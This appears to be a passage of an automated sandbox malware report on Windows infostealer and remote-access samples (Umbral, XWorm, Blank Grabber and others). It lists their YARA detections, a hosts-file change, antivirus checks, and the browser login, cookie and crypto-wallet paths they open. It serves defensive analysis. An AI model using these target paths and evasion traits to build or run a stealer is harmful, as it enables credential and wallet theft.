                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Insidious.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Umbral.exe VolumeInformation
                            Source: C:\Users\user\Desktop\Nursultan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Modifies the hosts file
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile written: C:\Windows\System32\drivers\etc\hosts
                            Source: Microsoft Edge.exe, 00000003.00000002.3351187295.000000001CCF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3287313221.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BE21000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BE7D000.00000004.00000020.00020000.00000000.sdmp, Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BDC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                            Stealing of Sensitive Information

                            barindex
                            Yara detected 44Caliber Stealer
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Yara detected BlackGuard
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Yara detected Blank Grabber
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
                            Yara detected Rags Stealer
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000038.00000002.2206155033.00000220C9505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 7384, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 7820, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 7380, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Yara detected Umbral Stealer
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 5492, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan.exe PID: 764, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsoft Edge.exe PID: 3056, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED
                            Found many strings related to Crypto-Wallets (likely being stolen)
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrum
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: BytecoinJaxx!com.liberty.jaxx
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Wallets\Exodus\
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Wallets\Ethereum\
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: Insidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: keystore
                            Tries to harvest and steal browser information (history, passwords, etc)
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.log
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED

                            Remote Access Functionality

                            barindex
                            Yara detected 44Caliber Stealer
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Yara detected BlackGuard
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Yara detected Blank Grabber
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB6688000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
                            Yara detected Rags Stealer
                            Source: Yara matchFile source: 11.0.Insidious.exe.24510880000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000026.00000002.2168782168.000001CFADD75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000000.2093948951.0000024510882000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000038.00000002.2206155033.00000220C9505000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 5340, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 7384, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 7820, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Insidious.exe PID: 7380, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Insidious.exe, type: DROPPED
                            Yara detected Umbral Stealer
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.0.Umbral.exe.1dcb4050000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 4.2.Nursultan2.exe.12f60e40.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 7084, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Nursultan2.exe PID: 5492, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Umbral.exe PID: 2316, type: MEMORYSTR
                            Source: Yara matchFile source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Umbral.exe, type: DROPPED
                            Yara detected XWorm
                            Source: Yara matchFile source: 3.0.Microsoft Edge.exe.b80000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.Nursultan.exe.128b3a60.1.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 0.2.Nursultan.exe.128b3a60.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Microsoft Edge.exe.12ef1a78.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 3.2.Microsoft Edge.exe.12ef1a78.0.raw.unpack, type: UNPACKEDPE
